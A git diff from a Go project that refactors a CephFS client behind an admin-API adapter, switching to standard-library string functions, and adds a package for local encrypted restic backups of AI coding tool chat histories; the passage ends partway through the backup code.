index 1b87a8cc0..f3ce3a0a0 100644
--- a/pkg/cephfs/cephfs_fuzz_test.go
+++ b/pkg/cephfs/cephfs_fuzz_test.go
@@ -423,36 +423,19 @@ func FuzzHelperFunctionsSecurity(f *testing.F) {
}
}()
- // Test contains function
- result1 := contains(str, substr)
+ // Test stdlib string functions with arbitrary input (should not panic)
+ result1 := strings.Contains(str, substr)
+ result2 := strings.Index(str, substr)
- // Test indexOf function
- result2 := indexOf(str, substr)
-
- // Basic consistency check
+ // Basic consistency check between Contains and Index
if substr != "" {
if result1 && result2 == -1 {
- t.Errorf("contains() returned true but indexOf() returned -1 for str=%q substr=%q", str, substr)
+ t.Errorf("strings.Contains() returned true but strings.Index() returned -1 for str=%q substr=%q", str, substr)
}
if !result1 && result2 != -1 {
- t.Errorf("contains() returned false but indexOf() found index %d for str=%q substr=%q", result2, str, substr)
+ t.Errorf("strings.Contains() returned false but strings.Index() found index %d for str=%q substr=%q", result2, str, substr)
}
}
-
- // Check for dangerous patterns
- if strings.Contains(str+substr, "\x00") {
- t.Logf("Null byte detected in string operations")
- }
-
- // Verify indexOf bounds
- if result2 != -1 && (result2 < 0 || result2 > len(str)) {
- t.Errorf("indexOf returned out-of-bounds index %d for string length %d", result2, len(str))
- }
-
- // Empty substring should match (indexOf should return 0) except when string is empty
- if substr == "" && str != "" && result2 != 0 {
- t.Errorf("indexOf should return 0 for empty substring on non-empty string, got %d", result2)
- }
})
}
diff --git a/pkg/cephfs/client.go b/pkg/cephfs/client.go
index bdef54812..0838d2e94 100644
--- a/pkg/cephfs/client.go
+++ b/pkg/cephfs/client.go
@@ -24,7 +24,7 @@ import (
// CephClient provides high-level interface for Ceph operations using go-ceph SDK
type CephClient struct {
conn *rados.Conn
- fsAdmin *admin.FSAdmin
+ fsAdmin fsAdminAPI
rc *eos_io.RuntimeContext
config *ClientConfig
secretManager *secrets.SecretManager
@@ -72,16 +72,16 @@ func NewCephClient(rc *eos_io.RuntimeContext, config *ClientConfig) (*CephClient
// Apply defaults
if config.ClusterName == "" {
- config.ClusterName = "ceph"
+ config.ClusterName = DefaultClusterName
}
if config.User == "" {
- config.User = "admin"
+ config.User = DefaultCephUser
}
if config.ConnectTimeout == 0 {
- config.ConnectTimeout = 30 * time.Second
+ config.ConnectTimeout = DefaultConnectTimeout
}
if config.OpTimeout == 0 {
- config.OpTimeout = 60 * time.Second
+ config.OpTimeout = DefaultOpTimeout
}
// Discover Consul monitors if enabled
@@ -206,8 +206,7 @@ func (c *CephClient) connect() error {
// Initialize FSAdmin for CephFS operations
logger.Debug("Initializing FSAdmin client")
- fsAdmin := admin.NewFromConn(conn)
- c.fsAdmin = fsAdmin
+ c.fsAdmin = newFSAdminAdapter(admin.NewFromConn(conn))
return nil
}
@@ -297,9 +296,15 @@ func (c *CephClient) GetConn() *rados.Conn {
return c.conn
}
-// GetFSAdmin returns the FSAdmin client for CephFS operations
+// GetFSAdmin returns the FSAdmin client for CephFS operations.
+// Deprecated: Prefer using CephClient methods (VolumeExists, ListVolumes, etc.)
+// which route through the fsAdminAPI interface seam for testability.
func (c *CephClient) GetFSAdmin() *admin.FSAdmin {
- return c.fsAdmin
+ adapter, ok := c.fsAdmin.(*goCephFSAdminAdapter)
+ if !ok {
+ return nil
+ }
+ return adapter.inner
}
// GetClusterFSID returns the cluster FSID
diff --git a/pkg/cephfs/comprehensive_test.go b/pkg/cephfs/comprehensive_test.go
index 704ad2e56..53a672932 100644
--- a/pkg/cephfs/comprehensive_test.go
+++ b/pkg/cephfs/comprehensive_test.go
@@ -113,8 +113,8 @@ func TestContainsFunction(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
- result := contains(tt.str, tt.substr)
- assert.Equal(t, tt.expected, result, "contains(%q, %q)", tt.str, tt.substr)
+ result := strings.Contains(tt.str, tt.substr)
+ assert.Equal(t, tt.expected, result, "strings.Contains(%q, %q)", tt.str, tt.substr)
})
}
}
@@ -145,8 +145,8 @@ func TestIndexOfFunction(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
- result := indexOf(tt.str, tt.substr)
- assert.Equal(t, tt.expected, result, "indexOf(%q, %q)", tt.str, tt.substr)
+ result := strings.Index(tt.str, tt.substr)
+ assert.Equal(t, tt.expected, result, "strings.Index(%q, %q)", tt.str, tt.substr)
})
}
}
@@ -730,8 +730,8 @@ func TestErrorHandling(t *testing.T) {
for _, tc := range testCases {
// These should not panic
- _ = contains(tc.str, tc.substr)
- _ = indexOf(tc.str, tc.substr)
+ _ = strings.Contains(tc.str, tc.substr)
+ _ = strings.Index(tc.str, tc.substr)
}
})
}
diff --git a/pkg/cephfs/fs_admin_api.go b/pkg/cephfs/fs_admin_api.go
new file mode 100644
index 000000000..e205fd0a5
--- /dev/null
+++ b/pkg/cephfs/fs_admin_api.go
@@ -0,0 +1,89 @@
+//go:build !darwin
+// +build !darwin
+
+package cephfs
+
+import "github.com/ceph/go-ceph/cephfs/admin"
+
+// fsAdminAPI constrains CephFS admin usage to a small EOS-owned seam.
+// This localizes breakage when go-ceph changes APIs.
+type fsAdminAPI interface {
+ ListVolumes() ([]string, error)
+ FetchVolumeInfo(volume string) (*admin.VolInfo, error)
+ CreateSubVolume(volume, group, name string, o *admin.SubVolumeOptions) error
+ ListSubVolumes(volume, group string) ([]string, error)
+ ResizeSubVolume(volume, group, name string, newSize admin.QuotaSize, noShrink bool) (*admin.SubVolumeResizeResult, error)
+ RemoveSubVolume(volume, group, name string) error
+ CreateSubVolumeSnapshot(volume, group, source, name string) error
+ RemoveSubVolumeSnapshot(volume, group, subvolume, name string) error
+ ListSubVolumeSnapshots(volume, group, name string) ([]string, error)
+ SubVolumeSnapshotInfo(volume, group, subvolume, name string) (*admin.SubVolumeSnapshotInfo, error)
+ CloneSubVolumeSnapshot(volume, group, subvolume, snapshot, name string, o *admin.CloneOptions) error
+ CloneStatus(volume, group, clone string) (*admin.CloneStatus, error)
+ ProtectSubVolumeSnapshot(volume, group, subvolume, name string) error
+ UnprotectSubVolumeSnapshot(volume, group, subvolume, name string) error
+}
+
+type goCephFSAdminAdapter struct {
+ inner *admin.FSAdmin
+}
+
+func newFSAdminAdapter(inner *admin.FSAdmin) fsAdminAPI {
+ return &goCephFSAdminAdapter{inner: inner}
+}
+
+func (a *goCephFSAdminAdapter) ListVolumes() ([]string, error) {
+ return a.inner.ListVolumes()
+}
+
+func (a *goCephFSAdminAdapter) FetchVolumeInfo(volume string) (*admin.VolInfo, error) {
+ return a.inner.FetchVolumeInfo(volume)
+}
+
+func (a *goCephFSAdminAdapter) CreateSubVolume(volume, group, name string, o *admin.SubVolumeOptions) error {
+ return a.inner.CreateSubVolume(volume, group, name, o)
+}
+
+func (a *goCephFSAdminAdapter) ListSubVolumes(volume, group string) ([]string, error) {
+ return a.inner.ListSubVolumes(volume, group)
+}
+
+func (a *goCephFSAdminAdapter) ResizeSubVolume(volume, group, name string, newSize admin.QuotaSize, noShrink bool) (*admin.SubVolumeResizeResult, error) {
+ return a.inner.ResizeSubVolume(volume, group, name, newSize, noShrink)
+}
+
+func (a *goCephFSAdminAdapter) RemoveSubVolume(volume, group, name string) error {
+ return a.inner.RemoveSubVolume(volume, group, name)
+}
+
+func (a *goCephFSAdminAdapter) CreateSubVolumeSnapshot(volume, group, source, name string) error {
+ return a.inner.CreateSubVolumeSnapshot(volume, group, source, name)
+}
+
+func (a *goCephFSAdminAdapter) RemoveSubVolumeSnapshot(volume, group, subvolume, name string) error {
+ return a.inner.RemoveSubVolumeSnapshot(volume, group, subvolume, name)
+}
+
+func (a *goCephFSAdminAdapter) ListSubVolumeSnapshots(volume, group, name string) ([]string, error) {
+ return a.inner.ListSubVolumeSnapshots(volume, group, name)
+}
+
+func (a *goCephFSAdminAdapter) SubVolumeSnapshotInfo(volume, group, subvolume, name string) (*admin.SubVolumeSnapshotInfo, error) {
+ return a.inner.SubVolumeSnapshotInfo(volume, group, subvolume, name)
+}
+
+func (a *goCephFSAdminAdapter) CloneSubVolumeSnapshot(volume, group, subvolume, snapshot, name string, o *admin.CloneOptions) error {
+ return a.inner.CloneSubVolumeSnapshot(volume, group, subvolume, snapshot, name, o)
+}
+
+func (a *goCephFSAdminAdapter) CloneStatus(volume, group, clone string) (*admin.CloneStatus, error) {
+ return a.inner.CloneStatus(volume, group, clone)
+}
+
+func (a *goCephFSAdminAdapter) ProtectSubVolumeSnapshot(volume, group, subvolume, name string) error {
+ return a.inner.ProtectSubVolumeSnapshot(volume, group, subvolume, name)
+}
+
+func (a *goCephFSAdminAdapter) UnprotectSubVolumeSnapshot(volume, group, subvolume, name string) error {
+ return a.inner.UnprotectSubVolumeSnapshot(volume, group, subvolume, name)
+}
diff --git a/pkg/cephfs/fs_admin_api_test.go b/pkg/cephfs/fs_admin_api_test.go
new file mode 100644
index 000000000..ff18602e7
--- /dev/null
+++ b/pkg/cephfs/fs_admin_api_test.go
@@ -0,0 +1,125 @@
+//go:build !darwin
+// +build !darwin
+
+package cephfs
+
+import (
+ "testing"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/testutil"
+ "github.com/ceph/go-ceph/cephfs/admin"
+)
+
+func TestGoCephFSAdminAdapter_ImplementsFSAdminAPI(t *testing.T) {
+ t.Parallel()
+
+ var _ fsAdminAPI = (*goCephFSAdminAdapter)(nil)
+}
+
+func TestCephClientGetFSAdmin_ReturnsNilWhenNoAdapterBound(t *testing.T) {
+ t.Parallel()
+
+ client := &CephClient{}
+ if got := client.GetFSAdmin(); got != nil {
+ t.Fatalf("expected nil fs admin when adapter is unset")
+ }
+}
+
+func TestCephClientGetFSAdmin_ReturnsWrappedAdminPointer(t *testing.T) {
+ t.Parallel()
+
+ raw := &admin.FSAdmin{}
+ client := &CephClient{
+ fsAdmin: newFSAdminAdapter(raw),
+ }
+
+ if got := client.GetFSAdmin(); got != raw {
+ t.Fatalf("expected wrapped admin pointer to be returned")
+ }
+}
+
+func TestCephClientVolumeExists_WithFakeFSAdmin(t *testing.T) {
+ t.Parallel()
+
+ client := &CephClient{
+ fsAdmin: &fakeFSAdmin{
+ volumes: []string{"alpha", "beta"},
+ },
+ }
+
+ exists, err := client.VolumeExists(testutil.TestRuntimeContext(t), "beta")
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if !exists {
+ t.Fatalf("expected volume to exist")
+ }
+
+ exists, err = client.VolumeExists(testutil.TestRuntimeContext(t), "gamma")
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if exists {
+ t.Fatalf("expected volume to be absent")
+ }
+}
+
+type fakeFSAdmin struct {
+ volumes []string
+}
+
+func (f *fakeFSAdmin) ListVolumes() ([]string, error) {
+ return append([]string(nil), f.volumes...), nil
+}
+
+func (f *fakeFSAdmin) FetchVolumeInfo(string) (*admin.VolInfo, error) {
+ return nil, nil
+}
+
+func (f *fakeFSAdmin) CreateSubVolume(string, string, string, *admin.SubVolumeOptions) error {
+ return nil
+}
+
+func (f *fakeFSAdmin) ListSubVolumes(string, string) ([]string, error) {
+ return nil, nil
+}
+
+func (f *fakeFSAdmin) ResizeSubVolume(string, string, string, admin.QuotaSize, bool) (*admin.SubVolumeResizeResult, error) {
+ return nil, nil
+}
+
+func (f *fakeFSAdmin) RemoveSubVolume(string, string, string) error {
+ return nil
+}
+
+func (f *fakeFSAdmin) CreateSubVolumeSnapshot(string, string, string, string) error {
+ return nil
+}
+
+func (f *fakeFSAdmin) RemoveSubVolumeSnapshot(string, string, string, string) error {
+ return nil
+}
+
+func (f *fakeFSAdmin) ListSubVolumeSnapshots(string, string, string) ([]string, error) {
+ return nil, nil
+}
+
+func (f *fakeFSAdmin) SubVolumeSnapshotInfo(string, string, string, string) (*admin.SubVolumeSnapshotInfo, error) {
+ return nil, nil
+}
+
+func (f *fakeFSAdmin) CloneSubVolumeSnapshot(string, string, string, string, string, *admin.CloneOptions) error {
+ return nil
+}
+
+func (f *fakeFSAdmin) CloneStatus(string, string, string) (*admin.CloneStatus, error) {
+ return nil, nil
+}
+
+func (f *fakeFSAdmin) ProtectSubVolumeSnapshot(string, string, string, string) error {
+ return nil
+}
+
+func (f *fakeFSAdmin) UnprotectSubVolumeSnapshot(string, string, string, string) error {
+ return nil
+}
diff --git a/pkg/cephfs/types.go b/pkg/cephfs/types.go
index 214fdaf3d..902fc9935 100644
--- a/pkg/cephfs/types.go
+++ b/pkg/cephfs/types.go
@@ -1,9 +1,8 @@
package cephfs
import (
+ "strings"
"time"
-
- "github.com/CodeMonkeyCybersecurity/eos/pkg/shared"
)
// Config represents the configuration options for CephFS deployment
@@ -63,7 +62,7 @@ func (c *Config) GetOSDMemoryTarget() string {
// GetMONCount returns the MON count with fallback to default
func (c *Config) GetMONCount() int {
- if c.MONCount == 0 {
+ if c.MONCount <= 0 {
return DefaultMONCount
}
return c.MONCount
@@ -71,7 +70,7 @@ func (c *Config) GetMONCount() int {
// GetMGRCount returns the MGR count with fallback to default
func (c *Config) GetMGRCount() int {
- if c.MGRCount == 0 {
+ if c.MGRCount <= 0 {
return DefaultMGRCount
}
return c.MGRCount
@@ -155,11 +154,17 @@ const (
DefaultMGRCount = 2
DefaultSSHUser = "root"
- // CephFS specific ports from shared/ports.go
- CephMONPort = 6789
- CephMGRPort = shared.PortConsul // Use next available port: 8161
- CephOSDPort = 6800 // Base port, OSDs use 6800-6900 range
- CephFSPort = 6810 // CephFS metadata server port
+ // CephFS specific ports
+ CephMONPort = 6789 // Standard Ceph monitor port
+ CephMGRPort = 8263 // Ceph manager dashboard (next available prime after shared ports)
+ CephOSDPort = 6800 // Base port, OSDs use 6800-6900 range
+ CephFSPort = 6810 // CephFS metadata server port
+
+ // Client defaults
+ DefaultClusterName = "ceph"
+ DefaultCephUser = "admin"
+ DefaultConnectTimeout = 30 * time.Second
+ DefaultOpTimeout = 60 * time.Second
// Health check timeouts
DefaultHealthCheckTimeout = 5 * time.Minute
@@ -212,10 +217,9 @@ type CephDeviceSpec struct {
Rotational *bool `yaml:"rotational,omitempty"`
}
-// GetCephMGRPort returns the next available port for CephFS MGR
+// GetCephMGRPort returns the Ceph manager dashboard port
func GetCephMGRPort() int {
- // Use the next available port from shared/ports.go
- return 8263 // Next available prime after shared ports
+ return CephMGRPort
}
// GetTerraformCephConfigPath returns the path to the Terraform configuration
@@ -232,7 +236,7 @@ func IsValidCephImage(image string) bool {
}
// Must contain a colon for tag
- if !contains(image, ":") {
+ if !strings.Contains(image, ":") {
return false
}
@@ -244,7 +248,7 @@ func IsValidCephImage(image string) bool {
}
for _, registry := range validRegistries {
- if len(image) >= len(registry) && image[:len(registry)] == registry {
+ if strings.HasPrefix(image, registry) {
return true
}
}
@@ -252,29 +256,6 @@ func IsValidCephImage(image string) bool {
return false
}
-// contains checks if a string contains a substring
-func contains(s, substr string) bool {
- return len(s) >= len(substr) &&
- (s == substr ||
- (len(s) > len(substr) &&
- (s[:len(substr)] == substr ||
- s[len(s)-len(substr):] == substr ||
- indexOf(s, substr) >= 0)))
-}
-
-// indexOf returns the index of the first occurrence of substr in s
-func indexOf(s, substr string) int {
- if len(substr) == 0 {
- return 0
- }
- for i := 0; i <= len(s)-len(substr); i++ {
- if s[i:i+len(substr)] == substr {
- return i
- }
- }
- return -1
-}
-
// VolumeInfo represents CephFS volume information
type VolumeInfo struct {
Name string
diff --git a/pkg/cephfs/types_test.go b/pkg/cephfs/types_test.go
index 14291f59d..264695fde 100644
--- a/pkg/cephfs/types_test.go
+++ b/pkg/cephfs/types_test.go
@@ -74,6 +74,11 @@ func TestConfig_GetMONCount(t *testing.T) {
config: &Config{MONCount: 5},
expected: 5,
},
+ {
+ name: "negative MON count falls back to default",
+ config: &Config{MONCount: -1},
+ expected: DefaultMONCount,
+ },
}
for _, tt := range tests {
@@ -101,6 +106,11 @@ func TestConfig_GetMGRCount(t *testing.T) {
config: &Config{MGRCount: 3},
expected: 3,
},
+ {
+ name: "negative MGR count falls back to default",
+ config: &Config{MGRCount: -1},
+ expected: DefaultMGRCount,
+ },
}
for _, tt := range tests {
diff --git a/pkg/chatbackup/README.md b/pkg/chatbackup/README.md
new file mode 100644
index 000000000..578b1af98
--- /dev/null
+++ b/pkg/chatbackup/README.md
@@ -0,0 +1,129 @@
+# pkg/chatbackup
+
+*Last Updated: 2026-03-01*
+
+Machine-wide backup of AI coding tool conversations, settings, and context files.
+
+## Purpose
+
+Provides hourly, deduplicated, encrypted backup of all AI coding assistant data across the system. This enables:
+
+- **Audit trail**: Complete record of all AI interactions
+- **Context preservation**: MEMORY.md, CLAUDE.md, settings survive reinstalls
+- **Feedback loop**: Statistical analysis of prompt engineering effectiveness
+- **Disaster recovery**: Restore any point-in-time snapshot
+
+## Supported Tools
+
+| Tool | Data Location | What's Backed Up |
+|------|--------------|-----------------|
+| Claude Code | `~/.claude/` | Sessions (JSONL), settings, memory, todos, plans |
+| OpenAI Codex | `~/.codex/` | Sessions, config, skills, shell snapshots |
+| VS Code | `~/.config/Code/` | Settings, keybindings, Cline/Roo/Copilot history |
+| Windsurf | `~/.config/Windsurf/` | Global storage, settings |
+| Cursor | `~/.config/Cursor/` | Global state, settings |
+| Continue | `~/.continue/` | Sessions, config |
+| Amazon Q | `~/.aws/amazonq/` | Chat history |
+| Aider | `~/.aider.*` | Chat history |
+
+Additionally scans `/opt/` for project-level context: `CLAUDE.md`, `AGENTS.md`, `QUICK-FACTS.md`, `.claude/` directories.
+
+## Usage
+
+```bash
+# One-time setup (creates restic repo, password, cron)
+sudo eos backup chats --setup
+
+# Manual backup run
+eos backup chats
+
+# Show what would be backed up (dry run)
+eos backup chats --dry-run
+
+# Prune old snapshots per retention policy
+eos backup chats --prune
+
+# List snapshots
+eos backup chats --list
+```
+
+## Architecture
+
+Follows Assess/Intervene/Evaluate pattern:
+
+- `constants.go` - Single source of truth for paths, permissions, timeouts
+- `types.go` - Configuration and result types
+- `registry.go` - Declarative registry of AI tools and their data locations
+- `backup.go` - Core backup logic (discover paths, run restic, update status)
+- `setup.go` - Setup and scheduling (init repo, generate password, configure cron)
+
+## Observability
+
+### Structured Logs
+
+All operations emit structured logs with key fields (`user`, `home_dir`, `path_count`, `tools_found`, `snapshot_id`, `bytes_added`, `duration`) for machine parsing.
+
+### Status File
+
+After each run, status is written atomically to:
+
+`~/.eos/restic/chat-archive-status.json`
+
+Example:
+
+```json
+{
+ "last_success": "2026-03-01T12:00:00Z",
+ "last_failure": "",
+ "last_snapshot_id": "abc123",
+ "bytes_added": 1024,
+ "success_count": 42,
+ "failure_count": 0,
+ "first_backup": "2026-02-20T11:00:00Z",
+ "tools_found": ["claude-code", "codex"]
+}
+```
+
+### Monitoring and Alerting
+
+- Alert when `last_success` is older than 24 hours.
+- Alert when `failure_count` increases between checks.
+- Track `bytes_added` trend for unusual spikes or sudden drops.
+- Track `tools_found` changes to detect missing tool data after migrations.
+
+Example health check (returns `0=OK`, `1=WARNING`, `2=CRITICAL`):
+
+```bash
+scripts/monitor/chatbackup-health.sh
+```
+
+## Testing and CI
+
+- Unit tests: `go test ./pkg/chatbackup/... ./cmd/backup/...`
+- Integration tests (real restic): `go test -tags=integration ./pkg/chatbackup/...`
+- E2E smoke: `go test -tags=e2e_smoke ./test/e2e/smoke/...`
+
+CI wiring:
+
+- Unit lane enforces coverage threshold from `test/ci/suites.yaml`.
+- Unit lane also runs `cmd/backup` tests to catch command orchestration regressions.
+- Integration lane runs `pkg/chatbackup` integration tests and installs `restic` when missing.
+- E2E smoke includes `backup chats --dry-run` command stability validation.
+
+## Adding a New Tool
+
+Add an entry to `DefaultToolRegistry()` in `registry.go`:
+
+```go
+{
+ Name: "my-tool",
+ Description: "My AI Tool chat history",
+ Paths: []SourcePath{
+ {
+ Path: "~/.my-tool/sessions",
+ Includes: []string{"*.json"},
+ Description: "Session transcripts",
+ },
+ },
+},
+```
diff --git a/pkg/chatbackup/backup.go b/pkg/chatbackup/backup.go
new file mode 100644
index 000000000..c27c44aad
--- /dev/null
+++ b/pkg/chatbackup/backup.go
@@ -0,0 +1,624 @@
+// Package chatbackup provides encrypted, deduplicated backup of AI coding tool
+// conversations (Claude Code, Codex, Cursor, etc.) using restic.
+//
+// Follows Assess → Intervene → Evaluate pattern:
+//
+// ASSESS: Discover which AI tools have data, resolve paths
+// INTERVENE: Run restic backup with resolved paths
+// EVALUATE: Parse results, update status, report
+//
+// RATIONALE: Go-native restic invocation instead of embedded bash scripts.
+// This is testable, type-safe, and observable via structured logging.
+package chatbackup
+
+import (
+ "bytes"
+ "context"
+ "encoding/json"
+ "errors"
+ "fmt"
+ "os"
+ "os/exec"
+ "os/user"
+ "path/filepath"
+ "sort"
+ "strings"
+ "syscall"
+ "time"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+ "github.com/uptrace/opentelemetry-go-extra/otelzap"
+ "go.uber.org/zap"
+)
+
+type opError struct {
+ Op string
+ Err error
+}
+
+func (e *opError) Error() string {
+ return fmt.Sprintf("%s: %v", e.Op, e.Err)
+}
+
+func (e *opError) Unwrap() error {
+ return e.Err
+}
+
+// resticSummary represents the JSON summary message from restic backup --json.
+type resticSummary struct {
+ MessageType string `json:"message_type"`
+ SnapshotID string `json:"snapshot_id"`
+ FilesNew int `json:"files_new"`
+ FilesChanged int `json:"files_changed"`
+ FilesUnmodified int `json:"files_unmodified"`
+ DataAdded int64 `json:"data_added"`
+ TotalDuration float64 `json:"total_duration"`
+}
+
+// RunBackup executes a single backup run.
+// It discovers AI tool data, runs restic backup, and returns the result.
+//
+// ASSESS: Resolve paths, check which tools have data
+// INTERVENE: Run restic backup
+// EVALUATE: Parse output, update status file
+func RunBackup(rc *eos_io.RuntimeContext, config BackupConfig) (*BackupResult, error) {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ // ASSESS: Resolve home directory
+ homeDir := config.HomeDir
+ if homeDir == "" {
+ var err error
+ homeDir, err = resolveHomeDir(config.User)
+ if err != nil {
+ return nil, &opError{
+ Op: "resolve home directory",
+ Err: fmt.Errorf("user %q: %w", config.User, err),
+ }
+ }
+ }
+ config.HomeDir = homeDir
+
+ logger.Info("Starting chat archive backup",
+ zap.String("user", config.User),
+ zap.String("home_dir", homeDir),
+ zap.Bool("dry_run", config.DryRun),
+ zap.Strings("extra_scan_dirs", config.ExtraScanDirs))
+
+ // ASSESS: Resolve restic paths
+ repoPath := filepath.Join(homeDir, ResticRepoSubdir)
+ passwordFile := filepath.Join(homeDir, ResticPasswordSubdir)
+ statusFile := filepath.Join(homeDir, ResticStatusSubdir)
+ lockFile := filepath.Join(homeDir, ResticLockSubdir)
+
+ // ASSESS: Discover which AI tools have data
+ registry := DefaultToolRegistry()
+ paths, toolsFound, skipped := discoverPaths(logger, registry, homeDir)
+
+ // ASSESS: Discover project-level context files in ExtraScanDirs
+ projectPaths := discoverProjectContext(logger, config.ExtraScanDirs)
+ paths = append(paths, projectPaths...)
+
+ if len(paths) == 0 {
+ logger.Info("No AI tool data found to back up")
+ return &BackupResult{
+ PathsSkipped: skipped,
+ }, nil
+ }
+
+ logger.Info("Discovered backup paths",
+ zap.Int("path_count", len(paths)),
+ zap.Strings("tools_found", toolsFound),
+ zap.Int("skipped_count", len(skipped)))
+
+ // DRY RUN: Report what would be backed up
+ if config.DryRun {
+ logger.Info("DRY RUN: Would back up the following paths")
+ for _, p := range paths {
+ logger.Info(" Would include", zap.String("path", p))
+ }
+ return &BackupResult{
+ PathsBackedUp: paths,
+ PathsSkipped: skipped,
+ ToolsFound: toolsFound,
+ }, nil
+ }
+
+ // ASSESS: Check restic is available
+ if _, err := exec.LookPath("restic"); err != nil {
+ updateStatus(logger, statusFile, nil, toolsFound)
+ return nil, &opError{
+ Op: "check restic installation",
+ Err: fmt.Errorf("%w", ErrResticNotInstalled),
+ }
+ }
+
+ // ASSESS: Check repository is initialized
+ if err := checkRepoInitialized(rc.Ctx, repoPath, passwordFile); err != nil {
+ updateStatus(logger, statusFile, nil, toolsFound)
+ return nil, &opError{
+ Op: "check repository initialization",
+ Err: fmt.Errorf("%w at %s: %v", ErrRepositoryNotInitialized, repoPath, err),
+ }
+ }
+
+ lockHandle, err := acquireBackupLock(lockFile)
+ if err != nil {
+ updateStatus(logger, statusFile, nil, toolsFound)
+ return nil, &opError{Op: "acquire backup lock", Err: err}
+ }
+ defer releaseBackupLock(lockHandle)
+
+ // INTERVENE: Run restic backup
+ result, err := runResticBackup(rc.Ctx, logger, repoPath, passwordFile, paths)
+ if err != nil {
+ // Update status with failure
+ updateStatus(logger, statusFile, nil, toolsFound)
+ return nil, fmt.Errorf("restic backup failed: %w", err)
+ }
+
+ result.PathsBackedUp = paths
+ result.PathsSkipped = skipped
+ result.ToolsFound = toolsFound
+
+ // EVALUATE: Update status file
+ updateStatus(logger, statusFile, result, toolsFound)
+
+ logger.Info("Chat archive backup completed",
+ zap.String("snapshot_id", result.SnapshotID),
+ zap.Int("files_new", result.FilesNew),
+ zap.Int("files_changed", result.FilesChanged),
+ zap.Int64("bytes_added", result.BytesAdded),
+ zap.String("duration", result.TotalDuration))
+
+ return result, nil
+}
+
+// discoverPaths resolves the tool registry into actual filesystem paths.
+// Returns: (existingPaths, toolsFound, skippedPaths)
+func discoverPaths(logger otelzap.LoggerWithCtx, registry []ToolSource, homeDir string) ([]string, []string, []string) {
+ var paths []string
+ var toolsFound []string
+ var skipped []string
+ seen := make(map[string]bool)
+
+ for _, tool := range registry {
+ toolHasData := false
+ for _, sp := range tool.Paths {
+ discovered, pathSkipped := discoverSourcePath(logger, homeDir, sp)
+ if pathSkipped {
+ skipped = append(skipped, expandHome(sp.Path, homeDir))
+ }
+ for _, p := range discovered {
+ if !seen[p] {
+ paths = append(paths, p)
+ seen[p] = true
+ toolHasData = true
+ }
+ }
+ }
+
+ if toolHasData {
+ toolsFound = append(toolsFound, tool.Name)
+ logger.Debug("Found data for tool",
+ zap.String("tool", tool.Name))
+ }
+ }
+
+ sort.Strings(paths)
+ sort.Strings(toolsFound)
+ sort.Strings(skipped)
+
+ return paths, toolsFound, skipped
+}
+
+// discoverProjectContext scans ExtraScanDirs for project-level AI context files.
+// Searches up to 4 levels deep for CLAUDE.md, AGENTS.md, .claude/ directories etc.
+func discoverProjectContext(logger otelzap.LoggerWithCtx, scanDirs []string) []string {
+ var paths []string
+ seen := make(map[string]bool)
+ patterns := ProjectContextPatterns()
+
+ for _, scanDir := range scanDirs {
+ if _, err := os.Stat(scanDir); err != nil {
+ logger.Debug("Scan directory not found",
+ zap.String("dir", scanDir))
+ continue
+ }
+
+ // Walk up to 4 levels deep looking for project context files
+ err := filepath.WalkDir(scanDir, func(path string, d os.DirEntry, err error) error {
+ if err != nil {
+ return nil // Skip errors, continue walking
+ }
+
+ // Limit depth to 4 levels from scanDir
+ rel, _ := filepath.Rel(scanDir, path)
+ depth := strings.Count(rel, string(filepath.Separator))
+ if depth > 4 {
+ if d.IsDir() {
+ return filepath.SkipDir
+ }
+ return nil
+ }
+
+ // Skip hidden directories except .claude
+ if d.IsDir() && strings.HasPrefix(d.Name(), ".") && d.Name() != ".claude" {
+ return filepath.SkipDir
+ }
+
+ // Skip common non-project directories
+ if d.IsDir() {
+ switch d.Name() {
+ case "node_modules", "vendor", "__pycache__", ".git", "venv", ".venv":
+ return filepath.SkipDir
+ }
+ }
+
+ // Check if this matches any project context pattern
+ for _, pattern := range patterns {
+ if d.Name() == pattern {
+ if !seen[path] {
+ paths = append(paths, path)
+ seen[path] = true
+ logger.Debug("Found project context file",
+ zap.String("path", path))
+ }
+ break
+ }
+ }
+
+ return nil
+ })
+ if err != nil {
+ logger.Debug("Error walking scan directory",
+ zap.String("dir", scanDir),
+ zap.Error(err))
+ }
+ }
+
+ return paths
+}
+
+// runResticBackup executes the restic backup command.
+func runResticBackup(ctx context.Context, logger otelzap.LoggerWithCtx, repoPath, passwordFile string, paths []string) (*BackupResult, error) {
+ args := []string{
+ "-r", repoPath,
+ "--password-file", passwordFile,
+ "backup",
+ "--tag", BackupTag,
+ "--tag", AutoTag,
+ "--json",
+ }
+
+ // Add excludes
+ for _, exclude := range DefaultExcludes() {
+ args = append(args, "--exclude", exclude)
+ }
+
+ // Add paths
+ args = append(args, paths...)
+
+ logger.Debug("Running restic backup",
+ zap.Strings("paths", paths),
+ zap.Int("exclude_count", len(DefaultExcludes())))
+
+ backupCtx, cancel := context.WithTimeout(ctx, BackupTimeout)
+ defer cancel()
+
+ cmd := exec.CommandContext(backupCtx, "restic", args...)
+ var stdout bytes.Buffer
+ var stderr bytes.Buffer
+ cmd.Stdout = &stdout
+ cmd.Stderr = &stderr
+
+ err := cmd.Run()
+ if err != nil {
+ if backupCtx.Err() == context.DeadlineExceeded {
+ return nil, fmt.Errorf("backup timed out after %s", BackupTimeout)
+ }
+ return nil, fmt.Errorf("restic backup failed: %w; stderr: %s", err, strings.TrimSpace(stderr.String()))
+ }
+
+ // Parse JSON output - restic outputs one JSON object per line
+ result := &BackupResult{}
+ for _, line := range strings.Split(stdout.String(), "\n") {
+ line = strings.TrimSpace(line)
+ if line == "" {
+ continue
+ }
+
+ var summary resticSummary
+ if err := json.Unmarshal([]byte(line), &summary); err != nil {
+ continue // Skip non-JSON lines
+ }
+
+ if summary.MessageType == "summary" {
+ result.SnapshotID = summary.SnapshotID
+ result.FilesNew = summary.FilesNew
+ result.FilesChanged = summary.FilesChanged
+ result.FilesUnmodified = summary.FilesUnmodified
+ result.BytesAdded = summary.DataAdded
+ result.TotalDuration = fmt.Sprintf("%.1fs", summary.TotalDuration)
+ }
+ }
+
+ if result.SnapshotID == "" {
+ logger.Debug("restic backup output", zap.String("stdout", stdout.String()), zap.String("stderr", stderr.String()))
